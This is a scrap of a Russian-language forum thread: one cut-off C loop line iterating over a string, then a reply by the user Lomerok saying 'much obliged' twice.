for (i=0; i<strlen(arguments); i++) {
se- Автор темы
- Добавить закладку
- #5
Lomerok
премного благодарен!
премного благодарен!